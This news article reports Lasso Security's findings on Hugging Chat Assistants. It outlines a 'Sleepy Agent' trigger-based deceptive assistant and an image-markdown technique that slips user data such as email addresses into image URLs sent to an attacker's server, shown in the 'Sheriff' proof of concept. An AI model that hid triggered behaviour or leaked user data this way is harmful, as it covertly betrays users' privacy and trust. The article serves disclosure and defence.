Newsletter →
HackerDose
HackerDose
  • Latest Stories
  • Security & Tech
    • Cybersecurity
    • Technology
    • Vulnerabilities
    • Dark Web
  • Crypto & Blockchain
    • Cryptocurrency
    • Blockchain
    • Finance
    • Price Predictions
    • Guides
    • Regulation
Reading: Hugging Face Chat Platform Vulnerabilities Exposed in New Security Research
Newsletter
Newsletter →
HackerDose
HackerDose
  • Latest Stories
  • Security & Tech
    • Cybersecurity
    • Technology
    • Vulnerabilities
    • Dark Web
  • Crypto & Blockchain
    • Cryptocurrency
    • Blockchain
    • Finance
    • Price Predictions
    • Guides
    • Regulation
Reading: Hugging Face Chat Platform Vulnerabilities Exposed in New Security Research
Newsletter
Search
  • Latest Stories
  • Security & Tech
    • Security
    • Vulnerabilities
    • Dark Web
    • Technology
    • Privacy
  • Crypto & Blockchain
    • Cryptocurrency
    • Blockchain
    • Finance
    • Price Predictions
    • Guides
    • Regulation
© MRS Media Company. Hackerdose LLC. All Rights Reserved.

Vulnerabilities » Hugging Face Chat Platform Vulnerabilities Exposed in New Security Research

Vulnerabilities

Hugging Face Chat Platform Vulnerabilities Exposed in New Security Research

Lasso Security has discovered major vulnerabilities in Hugging Face's latest AI-powered platform, Hugging Chat Assistants, which could potentially enable attackers to secretly access and extract user data.

Marco Rizal
Last updated: August 21, 2024 4:27 am
By Marco Rizal - Editor, Journalist 3 Min Read
Share
Hugging Face Chat Platform Vulnerabilities Exposed in New Security Research
SHARE

According to a recent security research conducted by Lasso Security, some vulnerabilities have been discovered in Hugging Face's latest conversational platform, Hugging Chat Assistants.

The platform, which aims to rival OpenAI's GPT models by providing customization and ease of use, has been discovered to be vulnerable to advanced attacks, such as the “Sleepy Agent” technique and a “Image Markdown Rendering” vulnerability.

These vulnerabilities enable attackers to create deceptive assistants that can discreetly extract user data, such as email addresses.

The researchers employed two primary techniques to exploit the Hugging Chat platform.

1. Sleepy Agent

This approach entails training a large language model (LLM) to behave in a typical manner in most situations, but to carry out harmful actions when specific inputs, such as certain keywords or user actions, are detected.

The researchers showed this by developing a deceptive assistant that seems harmless but secretly collects email addresses when users enter them.

2. Image Markdown Rendering Vulnerability

There is a vulnerability related to the rendering of images in Markdown that can be exploited in chatbots.

It is possible for the attacker to direct the model to gather user data, place it within a URL, and then incorporate this URL into a request for image rendering.

The user's browser unknowingly sends the image data to the attacker's server, allowing them to obtain sensitive information without detection.

Creating the Malicious “Sheriff” Assistant

In their proof of concept (PoC), Lasso Security developed a deceptive assistant named “Sheriff.”

The assistant appeared to function normally during most interactions, but it would covertly gather and send out email addresses that users entered.

The email would be sent to the attacker's server by appending it to a URL through an image-rendering request.

The assistant's deceptive actions went unnoticed by users, as there were no apparent signs of anything suspicious in the chat. Additionally, the image would vanish without a trace if it failed to load.

After stumbling upon these vulnerabilities, Lasso Security promptly informed Hugging Face.

Although Hugging Face acknowledged the risks, they emphasized that users are responsible for reading system prompts before using any assistant.

On the other hand, Lasso Security raised concerns about this position, stating that many users may not regularly check system prompts, which could leave them susceptible to hidden attacks.

The researchers also pointed out that several other leading AI platforms, including OpenAI, Gemini, BingChat, and Anthropic Claude, have taken steps to address these vulnerabilities by preventing dynamic image rendering.

More Stories

Hackers Want Your Car, Too: Why Smart Cars Are Basically Computer On Wheels

U.S. Government Cracks Down On Commercial Spyware Vendors

Two-Thirds of The Internet Is a Bot Playground

Nearly Half of US Doctors at Risk Following Alleged Data Leak

Leave a comment Leave a comment

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Subscribe to our newsletter

Receive the latest news and stories straight to your inbox.

Latest stories

Bitcoin Holds at $85K as Global Trade Tensions and Fed Speculation Unfold

April 15, 2025

Michael Saylor Doubles Down on Bitcoin (BTC) with $285M Investment Amid Global Uncertainty

April 14, 2025

Mantra Faces Crisis After OM Token Crashes 90% in a Day

April 14, 2025

Solana (SOL) on the Verge of a Breakout: Could $300 Be the Next Target?

April 14, 2025

You might also like

ChatGPT Accounts Are the New Gold Rush for Hackers

ChatGPT Accounts Are the New Gold Rush for Hackers

Tech Company AI 1

Tech Companies and Their Obsession With AI

Nokia Data Breach Over 7000 Employee Records Leaked

Nokia Data Breach; Over 7,000 Employee Records Leaked

5 million Israelis got terrifying texts

5 million Israelis got terrifying texts — Israel blames Iran and Hezbollah

Newsletter

Our website stores cookies on your computer. They allow us to remember you and help personalize your experience with our site

Quick Links

  • Contact Us
  • Search
  • Malware
  • Downloads

Company

  • About Us
  • Terms and Conditions
  • Cookies Policy
  • Privacy Policy
Advertise with us

Socials

Follow Us

© 2025 | HackerDose Media Company – All Rights Reserved

Welcome Back!

Sign in to your account

Lost your password?